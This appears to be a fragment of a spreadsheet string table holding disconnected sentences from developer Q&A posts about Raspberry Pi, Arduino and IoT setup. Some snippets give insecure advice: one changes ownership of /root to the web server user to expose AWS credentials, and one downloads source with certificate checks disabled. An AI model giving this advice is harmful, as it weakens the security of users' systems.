I don't know how well this fits to the NGINX config, but hope this helps a bit.</t>
  </si>
  <si>
    <t>For the container, we can do the following:
Edit /etc/apache2/envvars where environment settings for apache live:
change ownership of aws credentials file parent directory: 
chown -R www-data:www-data /root
restart
apache:
service apache2 restart
Note that here ownership of root's home directory was changed.</t>
  </si>
  <si>
    <t>An optional directive that can be used to check values for input:
Input control follows HTML5 input types and polyfills the HTML5 validation behavior for older browsers.</t>
  </si>
  <si>
    <t>References
Unable to lock JVM memory (ENOMEM)  Upsource Support | JetBrains
Juniper Networks - Possible cause of ENOMEM / ENOENT errors seen under the command "show krt queue"
Fighting Paperclip Errno::ENOMEM error - Adam Niedzielski
Kernel Programming Guide: Boundary Crossings
Understanding OutOfMemoryError
Avoiding OOM (Out of Memory) on Embedded Linux (pdf)</t>
  </si>
  <si>
    <t>Example: Beach Buggy Racing phone as controller
Nearby Notifications
Nearby Notifications enables you to advertise HTTPS URLs, trigger app intents, and trigger app installs using beacons.</t>
  </si>
  <si>
    <t>Operating systems such as Windows, Linux, BSD, and OSX are based upon a monolithic kernel, this possess a huge security problem as the monolithic kernel contains over ten million lines of code to operate, and to make the issues worse, most of the code comes from untrusted resources.</t>
  </si>
  <si>
    <t>An example of this would be a text field that is set to accept telephone numbers from a given country: instead of collecting digits and letters, and then validating them against the format, an input-masked field will only allow digits to be input, and will only accept them in an order that forms a valid input.</t>
  </si>
  <si>
    <t>I restarted VS and the Pi multiple times
I tried to deploy it in Release and Debug mode 
I cleaned and rebuilt the solution multiple times
I tried changing authentication to "none"
I tried changing the minimum/target version of the project
updated all NuGet packages
checked if I'm signed into VS
Been wasting way too many hours on this and I'm really hoping for a solution!</t>
  </si>
  <si>
    <t>And I don't know if it is necessary but you need to have a file in MyApps, 
and give it a name " Raspi-upload "
+ my Settings inside:
Status: Development
Development User: Only you
Permission Type: Full Dropbox
Allow implicit grant: Allow
-
Then you have your KEY:
I think you need this Key in Step #2 or You only need to Generate an ACCESS TOKEN
On the next TAB [Branding] choose a Name.</t>
  </si>
  <si>
    <t>For example, with .Net and TFS FinalBuilder7 can download latest version of code, update Nuget Packages, compile, increment version, digitally sign, package, deploy, send "completed" email.</t>
  </si>
  <si>
    <t>Questions with this tag discuss which private API can be used to accomplish different tasks, what are private API's signatures, runtime restrictions for usage of private API and so on.</t>
  </si>
  <si>
    <t>Our code verifies, but when we upload we get a lot of "Invalid library found in ..."
We are just trying to upload sample code off of instructables, and this is what it looks like: 
Our LED's arent lighting up and we have updated all libraries, our IDE is version 1.8.1, and our board and still nothing.</t>
  </si>
  <si>
    <t>To verify this I started an enterprise grade caugh HTTPS Sever on my computer (connected to the raspberry pie via ethernet):
I assembled a small Java program which uses Apache HttpClient 4.3 (just like my app does) and performed a video "upload":
My laptop can transmit to itself 60MB/s (12% CPU go to Java (one core of my i7), 8% go to OpenSSL) using this setup.</t>
  </si>
  <si>
    <t>Each time a transaction gets completed user has to press a push button to officially finish the transaction and enable super user to feed another authentication ID.</t>
  </si>
  <si>
    <t>wget -O ~/tbb43_20150316oss_src.tgz --no-check-certificate https://www.threadingbuildingblocks.org/sites/default/files/software_releases/source/tbb43_20150316oss_src.tgz
tar -xvzf tbb43_20150316oss_src.tgz
cd tbb43_20150316oss
make tbb CXXFLAGS="-DTBB_USE_GCC_BUILTINS=1 -D__TBB_64BIT_ATOMICS=0"  
However, it's not getting detected while cmake step of building OpenCV.</t>
  </si>
  <si>
    <t>Options
The options which apply to the userdel command are:
-f, --force
This option forces the removal of the user account, even if the user is still logged in.</t>
  </si>
  <si>
    <t>Check your network connection or try this later
Which is same that mentioned in the comment of above thread, you need to  troubleshoot the web authentication broker APIs to find the inside reasons.</t>
  </si>
  <si>
    <t>I keep getting permission denied when trying to do gcloud commands
and
I am the owner of the project, and the project is a freshly created project that I created via the dashboard.</t>
  </si>
  <si>
    <t>I am looking to install android on the rp3 model B+ 
and found this video 
Referring to this informal build of Lineage OS
How can I make sure it is trusted and safe?</t>
  </si>
  <si>
    <t>I am working on a school project using , I have no past experience with C++, and I want to generate a unique MAC Address for every chip.</t>
  </si>
  <si>
    <t>I'm writing a little micro-kernel from scratch for my Raspberry Pi (here's the code : https://github.com/yrakcaz/RasPiK/)
Everything seems to work fine but I have just a little problem : I would like to have a file system, but I don't find out how to get the root device address.</t>
  </si>
  <si>
    <t>I see a few boot messages and then the screen abruptly goes black (before I'm given the option of logging in).</t>
  </si>
  <si>
    <t>I am trying to verify I have power and verify positive and negative wires from cyberpower plug.</t>
  </si>
  <si>
    <t>We are noticing that till the app is active the SDK seems to refresh the token expiry time.</t>
  </si>
  <si>
    <t>As some are aware, there are a bunch of public BluetoothDevice API's, hidden at compile time, but are legally public at runtime using reflection.</t>
  </si>
  <si>
    <t>If you want to call a ReST service when an iBeacon is detected, you can use it with the detection script we provided.</t>
  </si>
  <si>
    <t>In some circumstances, this is good because if only one of the on-device credentials leaks, you can switch to an on-device, secured-at-manufacture alternate.</t>
  </si>
  <si>
    <t>By this way, the client side doesn't know about database's credentials and some private things you want to hide also.</t>
  </si>
  <si>
    <t>Anti virus is real time machine protection from unwanted (malicious) programs.</t>
  </si>
  <si>
    <t>It is suitable for use as a DIY home video security system and for commercial or professional video security and surveillance.</t>
  </si>
  <si>
    <t>More detailed information on the new instruction can be found in both Intel's and AMD's developer manuals or more conveniently on Wikipedia.</t>
  </si>
  <si>
    <t>Luckily it rebooted after 15 second, which was enough time to enter the SSH and delete the config in the very last second :D
I learned to always backup the system image now.</t>
  </si>
  <si>
    <t>But when it hits audioTrack.play()  it throws an error of saying its illegal state exception, unintilized AudioTrack.</t>
  </si>
  <si>
    <t>I have attempted to set it so that it loads as the root user each time with no luck.</t>
  </si>
  <si>
    <t>I believe if i grant access to UsbDevice android app process and all child processes (avrdude) gets access to according USB device file.</t>
  </si>
  <si>
    <t>I wouldn't want people to be able to connect to the web service and verify with some keys they read off the SD card.</t>
  </si>
  <si>
    <t>I think I may of been googling this stuff wrong, however I was wondering if I could have my raspberry Pi execute a command after I connect to it via SSH.</t>
  </si>
  <si>
    <t>Also I can write a program which will feed a hard-coded (and obfuscated) passphrase to mount.ecryptfs either as cli parameter or from stdin.</t>
  </si>
  <si>
    <t>I'm writing a small android app to send commands to SSH servers.</t>
  </si>
  <si>
    <t>Once I add the encryption, the Arduino reads nothing from the app even though the Android device outputs logs that show the APDU was requested.</t>
  </si>
  <si>
    <t>a string)
A user can uniquely assign the uploaded content to each of his/her registered raspberry devices.</t>
  </si>
  <si>
    <t>Arduino WiFi Shield upgrade
Disclaimer: to access to the USB devices correctly, the dfu-programmer needs to be used as root.</t>
  </si>
  <si>
    <t>I am trying to setup my Raspberry pi as WiFi access point with squid proxy.</t>
  </si>
  <si>
    <t>Both the Arduino's Wi-Fi shield and Google Glass is connected to my Android tablet's wireless hotspot (therefore creating a wireless link between Glass and the Arduino), the reason being that the Arduino Wi-Fi shield does not have the hardware capability to act as an Access Point.</t>
  </si>
  <si>
    <t>NOTE: When waiting for the condition variable the mutex is verified not to be owned, this is done by verifying (0 == std::mutex::__owner).</t>
  </si>
  <si>
    <t>Problem:
I think when an app reads these files, it risks reading corrupt data.</t>
  </si>
  <si>
    <t>I have purposely toggled Read/Write permissions on the share, basically denying the Pi access.</t>
  </si>
  <si>
    <t>I tried to update my IOT thing using aws nodejs sdk, but its giving me an "Validation Error" exception
Code:
Exception :
Does any one know whats wrong with my updateThing Code?</t>
  </si>
  <si>
    <t>Update
As I mentioned it is a packet sniffer application, so unfortunately I do not have control what is written into the registers of the controller.</t>
  </si>
  <si>
    <t>Now, the C# program can successfully read the whole 13-digit number of the card only when it is the first scan.</t>
  </si>
  <si>
    <t>AutoDetect firmware...
Can't autodetect firmware, because proper answer not received (may be unknown firmware).</t>
  </si>
  <si>
    <t>If I want to enable Bluetooth on my phone (with code), I had to confirm it, but this can't be possible on Android Things.</t>
  </si>
  <si>
    <t>I have verified multiple times that I'm sending the correct passphrase to the shell am command.</t>
  </si>
  <si>
    <t>Data logging and plotting to a graph in real time is essential and cannot be compromised.</t>
  </si>
  <si>
    <t>Below is a code snippet from a Lambda function which first authenticates the request (not shown), and then builds the url using STS credentials via assumeRole.</t>
  </si>
  <si>
    <t>I'm sure this is something simple and I've scoured everywhere ensuring proper settings but im still unable to upload the code.</t>
  </si>
  <si>
    <t>I have located the directories /sys/module/usb_f_rndis and /sys/bus/usb/drivers/cdc_ether which leads me to believe that it should be possible to somehow activate the ethernet over USB functionality.</t>
  </si>
  <si>
    <t>I'm new in the arduino community, I spent a lot of days to get up with my gsm sim900A module, but it seems not working it keeps blinking 1 sec, so the sim not registered to the network or something like that, I wonder if anybody has the same problem of me, but I really need help with that.</t>
  </si>
  <si>
    <t>I have two USB receivers for bar-code scanners connected to a raspberry pi3 (Windows IOT Core).</t>
  </si>
  <si>
    <t>Compressed 480292 bytes to 336714...
Wrote 480292 bytes (336714 compressed) at 0x00001000 in 30.0 seconds (effective 128.1 kbit/s)...
Hash of data verified.</t>
  </si>
  <si>
    <t>Compressed 128 bytes to 75...
Wrote 128 bytes (75 compressed) at 0x003fc000 in 0.0 seconds (effective 53.9 kbit/s)...
Hash of data verified.</t>
  </si>
  <si>
    <t>Compressed 4096 bytes to 26...
Wrote 4096 bytes (26 compressed) at 0x003fe000 in 0.0 seconds (effective 2340.6 kbit/s)...
Hash of data verified.</t>
  </si>
  <si>
    <t>I try to write a hex string from Raspberry Pi to Fingerprint Identification Module ZFM-20 and read the response of this module.</t>
  </si>
  <si>
    <t>How do I update the certificate of an existing Thing in AWS IoT, assuming I know the thing name and an attribute with the same value?</t>
  </si>
  <si>
    <t>Just spent hours trying different SSH key pair tutorials trying to fix this to no avail.</t>
  </si>
  <si>
    <t>If the user enters the wrong series of switches 3 times, then they are locked out for 10 seconds.</t>
  </si>
  <si>
    <t>AutoDetect firmware...
Can't autodetect firmware, because proper answer not received (may be
  unknown firmware).</t>
  </si>
  <si>
    <t>(Exception from HRESULT: 0x80070032)
And
System.AccessViolationException
    HResult=0x80004003
    Message=Attempted to read or write protected memory.</t>
  </si>
  <si>
    <t>The code from google opens the browser where I can authentificate me, than it creates a token und load the calendar data.</t>
  </si>
  <si>
    <t>Some other developer already setup the MQTT and give me the aws account credentials.</t>
  </si>
  <si>
    <t>The little circle spins (loading) and nothing happens for few minutes after which I get an error "Enrollment failed.</t>
  </si>
  <si>
    <t>I have also verified package manifest references Serial Communication.</t>
  </si>
  <si>
    <t>Is there a way for me to just write my wireless internet config straight to the micro-sd card so the raspberry pi will be able to connect to the wifi, and then allow me to ssh in?</t>
  </si>
  <si>
    <t>Now the problem is that, for better security and privacy, Android App should detect only my ESP8266 for smartConfig.</t>
  </si>
  <si>
    <t>If I connect the board in normal mode the loaded firmware is initialized but if I connect in flash mode (GPIO0 to GND) I can not update the firmware as if I could do it the previous time.</t>
  </si>
  <si>
    <t>I have been able to get the ESP to connect to the wifi and send info to ThingSpeak by putting in my wifi name and password as well as my ThingSpeak Write API Key and storing them in the ESP's EPROM.</t>
  </si>
  <si>
    <t>I'd like it for the IOS app to recognize that the product is nearby and allow the user to enter the necessary data (WiFi information, login credentials, etc.)</t>
  </si>
  <si>
    <t>Sending single bytes give also no bytes detected .</t>
  </si>
  <si>
    <t>The script is essentially asking for the credentials once, then passing them into each URL through a loop.</t>
  </si>
  <si>
    <t>I am trying to send the below sensor values from the registered device in Hono to Ditto in order to form the digital twin of the registered device.</t>
  </si>
  <si>
    <t>so i cant get any kind of notification when i connect or disconnect device so please can any one tell me how can i connect or detect Non MFI registered accessory tot iPhone
Thanks.</t>
  </si>
  <si>
    <t>Which implementation option is easier and more foolproof both from hardware setup (soldering?</t>
  </si>
  <si>
    <t>They wouldn't make an Ethernet shield for this platform if it was only useful for non-standard packets.</t>
  </si>
  <si>
    <t>There is a higher option (1000MHz), but some people on the forum complained about SD corruption with that one.</t>
  </si>
  <si>
    <t>Make sure you also take a look at adding permissions to the manifest file, and of course, the Android Developer Guide for Bluetooth.</t>
  </si>
  <si>
    <t>Actually, I had already tried the method suggested by @TevoD and running lsusb did show that the FTDI usb device was recognized within Virtualbox, however, I kept getting avrdude failure.</t>
  </si>
  <si>
    <t>I think you're using this program to verify that a remote host is still connected to port 12345 and 12346 and hasn't been rebooted.</t>
  </si>
  <si>
    <t>It's reserved for factory flashing and testing only - and even then they told me in a support ticket that RN-171 cannot be flashed with RN-ISP after all over SPI.</t>
  </si>
  <si>
    <t>You should register with a free DNS service, such as no-ip (https://www.noip.com/managed-dns) and configure dynamic dns with your router (given it is able to do so).</t>
  </si>
  <si>
    <t>This means that the sshd daemon is pretending to be an X server with display #10, whereas in reality it is forwarding all connections through to your local PC where they reach the real X server.</t>
  </si>
  <si>
    <t>In the case of the raspberry pi that rom is the flash on the sd card, and it is easily removed by you at your desk to be reprogrammed at any time it gets erased or corrupt.</t>
  </si>
  <si>
    <t>Try this:
cd usr/local/sbin/cronjobs &amp;&amp; virtualenv/secret_ciphers/bin/activate
  &amp;&amp; cd csgostatsbot &amp;&amp; python3 CSGO_STATS_BOT_TASK.py &amp;&amp; deactivate
Assuming that the virtualenv directory is in the cronjobs directory.</t>
  </si>
  <si>
    <t>Some bits hardware registers (usually, which only can be cleared by user, never set by user) can be cleared by writing 1.</t>
  </si>
  <si>
    <t>It doesn't really matter what the MAC address is as long as it's unique on any given ethernet segment.</t>
  </si>
  <si>
    <t>I dont think you can auto detect the ports, youd have to ping the device in order to see if the device is connected.</t>
  </si>
  <si>
    <t>You can use the  command to detect and deactivate the captive portal from a shell script.</t>
  </si>
  <si>
    <t>Some computers allow that, other computers need a cross-wired ethernet cable.</t>
  </si>
  <si>
    <t>To enable for read and write you should set the permissions for ACM0 or can also add you user to dialog group.</t>
  </si>
  <si>
    <t>Some BLE devices require a random address at connection time.</t>
  </si>
  <si>
    <t>So, these GPIO devices are registered at runtime by the kernel and associated to a specific GPIO device driver.</t>
  </si>
  <si>
    <t>Please consider: If you set a breakpoint to a writeable program address (in SRAM/DRAM) the debugger will use software breakpoints: A breakpoint instruction gets patched in your application code.</t>
  </si>
  <si>
    <t>If the CRC is mainly for paranoia (from the comments), you can give up some  error-checking robustness and processor time for framing.</t>
  </si>
  <si>
    <t xml:space="preserve">
What I am still asking myself though is whether the IoT Hub does
  detect that there are multiple active connections that use the same
  deviceid and credentials?</t>
  </si>
  <si>
    <t>So, for example, once you've registered a username on the Hue bridge, you can turn it on like this
where "2" is the ID for the bulb in question, and send the JSON payload of
I believe Wemo uses a REST api</t>
  </si>
  <si>
    <t>If you have the correct permissions already then few questions to be sure:
Is the beacon recognized as Eddystone UID by the Beacon Toy app?</t>
  </si>
  <si>
    <t>By the time this happens the on-connection event handler has been registered.</t>
  </si>
  <si>
    <t>You need to reboot the device after the app has started to get access to the permissions
Dangerous permissions requested by apps are not granted until the next device reboot.</t>
  </si>
  <si>
    <t>If you write code that violates this principle then the watchdog might reset your device any time.</t>
  </si>
  <si>
    <t>This approach won't require a user to download another app just to type in the WiFi credentials.</t>
  </si>
  <si>
    <t>Curses is an graphical API for CLI programs, you can achieve much more than just detect key events.</t>
  </si>
  <si>
    <t>From https://cloud.google.com/iot/docs/how-tos/credentials/jwts
"Cloud IoT Core supports the following signing algorithms:
JWT RS256 (RSASSA-PKCS1-v1_5 using SHA-256 RFC 7518 sec 3.3).</t>
  </si>
  <si>
    <t>Remember that AWS Iot artifacts (things, certificates, policies, ...) are always created in a certain region.</t>
  </si>
  <si>
    <t>For example:
As above code snippet showed, after delete the BitmapBuffer object, you could lock the buffer again successfully.</t>
  </si>
  <si>
    <t>The error means that the token is not valid and its not valid because the time on the PI is different then the actual time.</t>
  </si>
  <si>
    <t>Responsibility for this non-telemetry pipe is to persist a real device state in the database.</t>
  </si>
  <si>
    <t>The alternative is to wipe the sector of flash on your ESP where the credentials are stored, which is a lot more work.</t>
  </si>
  <si>
    <t>Step 1: Add wifi setup to your  so it can connect to your wireless AP:
Step 2: Add these to your mos.yml.</t>
  </si>
  <si>
    <t>For device certificate created in this step:
Step 4 - Create a new device
Where can I find these files and how to generate those files?</t>
  </si>
  <si>
    <t>You can use this link to try out primary operations like enrolling and searching for enrolled users.</t>
  </si>
  <si>
    <t>Since USB is a master-slave(s) interface &amp; protocol, you cannot simply connect two Raspberry PI 1/2/3 boards together using USB, because that would be a master-to-master connection.</t>
  </si>
  <si>
    <t>Using custom authorizer doesn't require you to create or have any
things registered in your account.</t>
  </si>
  <si>
    <t>Error happen when i use LAN caple without electromagnetic shielding like this one:
https://i.stack.imgur.com/KlfC6.png
this Cable has Metal and somehow disturb my Sensor-Reading when connect with Raspberry.</t>
  </si>
  <si>
    <t>The final thing we need to do is set up a custom rake task that will run tests on the Pi without having to manually SSH into it.</t>
  </si>
  <si>
    <t>I do not have an LCD to verify this, but something similar should correctly read the bytes as a double.</t>
  </si>
  <si>
    <t>It aims to simplify mock creation while writing unit-tests and also to verify behaviour.</t>
  </si>
  <si>
    <t>JSch allows you to connect to an SSH server and use port forwarding, X11 forwarding, file transfer, etc., and you can integrate its functionality into your own Java programs.</t>
  </si>
  <si>
    <t>In other words, at the cabling level, such as ethernet is one, and another example is Token Ring.</t>
  </si>
  <si>
    <t>This is usually accomplished by a programmable IR chip embedded into the card which is read by the scanner.</t>
  </si>
  <si>
    <t>This wiki describes the memory locking mechanisms that are available to real-time applications in SunOS.</t>
  </si>
  <si>
    <t>One can also use a data stream to read/write raw unencoded binary data.</t>
  </si>
  <si>
    <t>John the Ripper already supported MPI using a patch, but at that time it worked only for Brute-Force attack.</t>
  </si>
  <si>
    <t>With it, commands may be constructed using connection and authentication information previously obtained from the RTMP server by rtmpsrv.</t>
  </si>
  <si>
    <t>Getting started
In order to make requests, you'll need to obtain an API key.</t>
  </si>
  <si>
    <t>embedded systems, Raspberry Pis, smart phones), so they don't need to report every sensor reading over a network.</t>
  </si>
  <si>
    <t>Safari app extensions are written using a combination of JavaScript, CSS, and native code written in Objective-C or Swift.</t>
  </si>
  <si>
    <t>As the registry, the MBeanServer provides functionality to register, unregister, enumerate and search for MBeans.</t>
  </si>
  <si>
    <t>Writing encryption algorithms is hard, and it's always amazing if one you write actually turns out to be secure.</t>
  </si>
  <si>
    <t>Virtual Private Servers (VPS) may not have FUSE support compiled into their kernels.</t>
  </si>
  <si>
    <t>But the Arduino IDE gives a large number of errors when trying to verify the sketch.</t>
  </si>
  <si>
    <t>I want to open a pop-up when anyone try to connect to my Raspberry wifi access point.</t>
  </si>
  <si>
    <t>Now that I have disconnected the LAN cable to the Pi and set up the 3g connection, I cannot log into it anymore.</t>
  </si>
  <si>
    <t>I have set up my trial account and successfully registered some devices.</t>
  </si>
  <si>
    <t>Note: values are verified when values are transferred via Ethernet to the webserver.</t>
  </si>
  <si>
    <t>I don't want to store credentials in my source code like many other samples do; so I decided to use WPS.</t>
  </si>
  <si>
    <t>I'm receiving
The password for this account has expired
error all the time as shown in logs below.</t>
  </si>
  <si>
    <t>Overall my question would be, is the certificate I was using for trying to connect (the Baltimore CyberTrust Root) the right certificate to use, and is there any obvious settings in mbedtls that I didn't set?</t>
  </si>
  <si>
    <t>What are the steps and parameters i need to specify to generate agent credentials?</t>
  </si>
  <si>
    <t>The docs for IoTCreateTopicRuleRequest() state it requires admin access but I don't quite understand which is the applicable policy - there are quite a few and most/many with way too much security clearance.</t>
  </si>
  <si>
    <t>Please try again)
I'm user username as: alex &amp; password: alexuser as given in quick start guide of WSO2 emm.</t>
  </si>
  <si>
    <t>remove those and let lambda pass give me the credentials and I get the error again.</t>
  </si>
  <si>
    <t>The Arduino wifi shields actually contain an microcontroller "bigger" than the Arduino itself, and that also would buffer the ethernet traffic.</t>
  </si>
  <si>
    <t>It obviously has to have an ethernet or wireless port/shield but otherwise it doesn't matter.</t>
  </si>
  <si>
    <t>I don't know about your project details, but  it looks like you want to lock a thing via keypad or fingerprint.</t>
  </si>
  <si>
    <t>Couldn't get anywhere with this issue in SSHJ, so decided to give JSch a try which offers the same functionality.</t>
  </si>
  <si>
    <t>If you have a guest network option they sometimes block samba from communicating between clients.</t>
  </si>
  <si>
    <t>Java either tells the user about the invalid scan and goes back to step 1, or for a valid scan proceeds to step 4.</t>
  </si>
  <si>
    <t>To verify your camera is not damaged, try the following script:</t>
  </si>
  <si>
    <t>You didn't give us a URL to verify (would be hard because of the token, I know).</t>
  </si>
  <si>
    <t>So to complete a packet you need to transmit 2048 bytes which you are not writing.</t>
  </si>
  <si>
    <t>When you setup the project, you need to create a device model and then download a client_secrets file.</t>
  </si>
  <si>
    <t>If that's not it, verify that when you're creating the device, you're specifying an RSA key with the x509 wrapper (there's options for RS256, ES256, RS256_X509, ES256_X509).</t>
  </si>
  <si>
    <t>So the key-pair is fixed for a given secure element chip.</t>
  </si>
  <si>
    <t>Therefore, the root of trust in your case (so that you know if the device was registered already or not) should be the provisioning status showing on your iot central application.</t>
  </si>
  <si>
    <t>The portion of Windows API dealing with cryptography.</t>
  </si>
  <si>
    <t>However, such archives may be a security threat, because the user can't really know what is inside of it until he runs the application, which may potentially contain dangerous code.</t>
  </si>
  <si>
    <t>An Option ROM typically consists of firmware that is called by the system BIOS.</t>
  </si>
  <si>
    <t>Once a fence is registered, the Fence API can send callbacks to your app even when it's not running.</t>
  </si>
  <si>
    <t>Google will then sign your apps with your key for you after you sign them with your new "upload key" and push them to Play.</t>
  </si>
  <si>
    <t>You may contribute to the project using the GitHub repository
There is also a frontend demo and backend demo of OpenCart - login with demo/demo.</t>
  </si>
  <si>
    <t>AVX provides a new encoding for all previous Intel SSE instructions, giving 3-operand non-destructive operation.</t>
  </si>
  <si>
    <t>tables, matrices, arrays, tensors), some data may not be observed, may be corrupted, or may not yet be observed.</t>
  </si>
  <si>
    <t>This is insecure as anyone can just inspect it and click 'show'.</t>
  </si>
  <si>
    <t>However, when I run git clone or ssh -vT git@myhost the error I get is
I have also changed the shell to the gitolite-shell but this gives me an error stating that "-c" is an unrecognized command.</t>
  </si>
  <si>
    <t>So I tried follow a few online tutorials on adding my IP to the SSH allow file but nothing seemed to work.</t>
  </si>
  <si>
    <t>I am having trouble following the procedure on the Arduino website to update the wifi shield firmware.</t>
  </si>
  <si>
    <t>My network provider contact did not give me any such details.</t>
  </si>
  <si>
    <t>I used the "address=/#/192.168.137.45"  option to enable http redirection.</t>
  </si>
  <si>
    <t>In my code, the names are the following: 
Red LED - LOCK 
Yellow LED - PROX_SENSOR_LED 
Proximity - PROX
This is my code in IDE:</t>
  </si>
  <si>
    <t>The device is detected on 0x77 address of I2C, i2cdump runs with no error and shows correct values (e.g.</t>
  </si>
  <si>
    <t>I know the basics of Arduino and networking, but I don't have many experience with Ethernet shield.</t>
  </si>
  <si>
    <t>I'm using the Adafruit example INO with WiFiClientSecure, which successfully connects to my Wifi works fine with other MQTT Servers (e.g.</t>
  </si>
  <si>
    <t>If you've completed all of the above steps, your MariaDB
installation should now be secure.</t>
  </si>
  <si>
    <t>If the UUID is valid and doesnt overlap with other devices, then the user successfully register the device.</t>
  </si>
  <si>
    <t>Ethernet/SPI uses several pins to communicate with the Ethernet shield.</t>
  </si>
  <si>
    <t>done
Save Ctrl + O; Exit: Ctrl + X
chmod a + x. xsession
cp / opt / kiosk / .xsession / home / kiosk
Set Auto-Login.</t>
  </si>
  <si>
    <t>As I haven't got a reproducible example with aws-cli, I'll show what I did to verify operation in the flickr_api case.</t>
  </si>
  <si>
    <t>But only the LED state is transmitted and not the key state.</t>
  </si>
  <si>
    <t>If you wish to view your Raspberry Pi GUI on your laptop follow these steps:
Enable ssh via .</t>
  </si>
  <si>
    <t>According to the documentation at https://learn.adafruit.com/adafruit-io/browser the parameter for the key is X-AIO-Key.</t>
  </si>
  <si>
    <t>There is a tutorial for creating a device identity you can follow.</t>
  </si>
  <si>
    <t>if you like, upgrade it to https using some ssl/ certificate process, there are so many youtube tutorials which could show this.</t>
  </si>
  <si>
    <t>I was able to figure it out: it can be configured in watchdog options for firmware compiler.</t>
  </si>
  <si>
    <t>But I was curious to know how this election system work, So I decided to get my self nominated and observe this procedure closely.</t>
  </si>
  <si>
    <t>When I try to Login on the access point i get the following debug-output from the server.</t>
  </si>
  <si>
    <t>I have generated the access keys and followed all the steps.</t>
  </si>
  <si>
    <t>However, each time when I enter to the mpiu the system ask me the passwd so this step I wanna get rid of.</t>
  </si>
  <si>
    <t>If authorization will be done only T can upload the new firmware.</t>
  </si>
  <si>
    <t>Also I don't know what is "firmware" and should I additionally upload it somehow.</t>
  </si>
  <si>
    <t>My goal is to activate an electric lock that works with 10-24V AC and DC, for this I have placed a transistor 2N2222 and a resistance of 330 Ohms.</t>
  </si>
  <si>
    <t>I'm working on a project and I need to generate a code (ID) that I can verify later.</t>
  </si>
  <si>
    <t>1) Saving the DB credentials on raspi.</t>
  </si>
  <si>
    <t>Finally I used register_x509.js file to register my device to Azure.</t>
  </si>
  <si>
    <t>You might be able to hack the TFT shield so that it uses SPI, but that is a project in itself.</t>
  </si>
  <si>
    <t>If it can't connect, prompt the user to input credentials.</t>
  </si>
  <si>
    <t>These are , mqtt_port and blynk_token, which now contain the values read from the json which was saved in SPIFF.</t>
  </si>
  <si>
    <t>Google Authenticator is an open-sourced application, created by Google and designed to support creation of one-time-passwords based on time (valid for a short period of time) or on number of intervals (invalidating after one use).</t>
  </si>
  <si>
    <t>The steps involved in originating a VoIP telephone call are signaling and media channel setup, digitization of the analog voice signal, encoding, packetization, and transmission as Internet Protocol (IP) packets over a packet-switched network.</t>
  </si>
  <si>
    <t>You can quickly test this by configuring Apache to run as root by setting the following in :
Since it's not a good idea to run a webserver as root, you'll want to find out what user Apache usually runs as on your system (probably www) and give that user permission to use the serial port.</t>
  </si>
  <si>
    <t>One possible way is storing the files also in a encrypted partition of the rpi and sending the pass-phrase to the rpi every time I want to sync, but I did not find an extremely simple way to do this (e.g.</t>
  </si>
  <si>
    <t>The meaning of this is (from documentation):
+CREG y,x
y = 1: Enable network registration unsolicited result code
x = 0: Not registered, MT is not currently searching a new
operator to register to
Why doesn't it search for a network?</t>
  </si>
  <si>
    <t>Examples of writing standard output include:
Using tee with sudo command
As part of a pipe, tee can take the input and elevate permissions 
$ echo "foo" | sudo tee -a file 
Links
How do I tee variable number of times in a bash for loop?</t>
  </si>
  <si>
    <t>The Voltage on the high side of this circuit is dangerous, and can cause severe injury or death  I strongly suggest you take all possible precautions and use Personal Protective Equipment.</t>
  </si>
  <si>
    <t>You'll want to go through the jupyterhub configuration, but two option that weren't obvious to me, but useful were these:
c.JupyterHub.cookie_secret_file = '/srv/jupyterhub/jupyterhub_cookie_secret'
c.JupyterHub.db_url = '/srv/jupyterhub/jupyterhub.sqlite'
Set those paths however you'd like, but they'll save you from having files created in whatever directory you start jupyterhub from.</t>
  </si>
  <si>
    <t>On the local computer where the SSHFS is mounted, the implementation makes use of the FUSE (Filesystem in Userspace) kernel module.</t>
  </si>
  <si>
    <t>As a final alternative if the above two options are not safe ones, I'm trying to understand a lookup function I found in a shell scripting book.</t>
  </si>
  <si>
    <t>This gave me more free cycles to fully read the incoming serial without corruption and improved efficiency.</t>
  </si>
  <si>
    <t>First suppress the loading of the modules by blacklisting and load them in a specific order later on:
Type this to the terminal:
This creates a new file.</t>
  </si>
  <si>
    <t>Related Resources
UVM User's Guide 1.1
UVM User's Guide 1.2
IEEE Std 1800.2-2017 (Universal Verification Methodology Language Reference Manual)</t>
  </si>
  <si>
    <t>However, when I tried the same MVC WebApplication but with "Individual Authentication", it gives the following error:
After googling, I found it here that this method 'RegisterModule()' is not implemented in mono's System.Web.HttpApplication.</t>
  </si>
  <si>
    <t>With email/password, you can create a special account for your Thing in the console, and use those credentials to log in.</t>
  </si>
  <si>
    <t>If someone nabs the Pi and tears the SD card apart, all they'll find are credentials that let them attach to the store WiFi and watch the same videos.</t>
  </si>
  <si>
    <t>I also keep any sensitive values (wifi credentials, passwords, API keys) in this file, and exclude it from code I publish on Github.</t>
  </si>
  <si>
    <t>I trying to write a small c program witch reads out an GPIO pin to shutdown the pi externally.</t>
  </si>
  <si>
    <t>Is reading and writing from and to a serial port under Linux thread-safe?</t>
  </si>
  <si>
    <t>I got it working clean when I have the credentials hard coded, but getting it to accept credentials is proving difficult.</t>
  </si>
  <si>
    <t>The main idea is that Raspberry will be connected to a sensor, collect data and send it via WiFi to Android device.</t>
  </si>
  <si>
    <t>I want to open a ssh session to my Raspberry Pi and run simple command  at what time I want ( means not using system("ssh pi@192.168.1.5 echo 0=+10 &gt; /dev/servoblaster") because it takes time to run ssh again).</t>
  </si>
  <si>
    <t>I am having a problem because I am trying to connect to my raspberry pi using telnet but when it comes to the part where it is reading for the username entry I get an error which I have pasted bellow.</t>
  </si>
  <si>
    <t>The pro's by this method would be omitting the extra "file-step", but it would make the system more vulnerable to any interruptions in the connection.</t>
  </si>
  <si>
    <t>https://www.adafruit.com/products/751
I am trying to implement a patient identification system using the adafruit fingerprint sensor with arduino.</t>
  </si>
  <si>
    <t>At the same time, I want to make "on" or "off" a LED by clicking "lock" and "unlock" buttons on the android app.</t>
  </si>
  <si>
    <t>the main problem is when im running the code with xamp from my pc 
the geolocation works perfectly, but when im running it from raspberry
with webkit i get geolocation error, i think the problem is the Geolocation Policy on webkit, how to give permission?</t>
  </si>
  <si>
    <t>If I execute service cron status I can see:active runningand my file has permissions for read and write.</t>
  </si>
  <si>
    <t>Now i have connected my raspberry pi to the laptop using the ethernet cable and used putty to connect to this device by using the ip address 169.254.1.1 and port 22 using SSH.</t>
  </si>
  <si>
    <t>All
  normal and dangerous permissions declared in your app's manifest are
  granted at install time.</t>
  </si>
  <si>
    <t>I spent several hours yesterday securing the computer and there have been no logins since that time.</t>
  </si>
  <si>
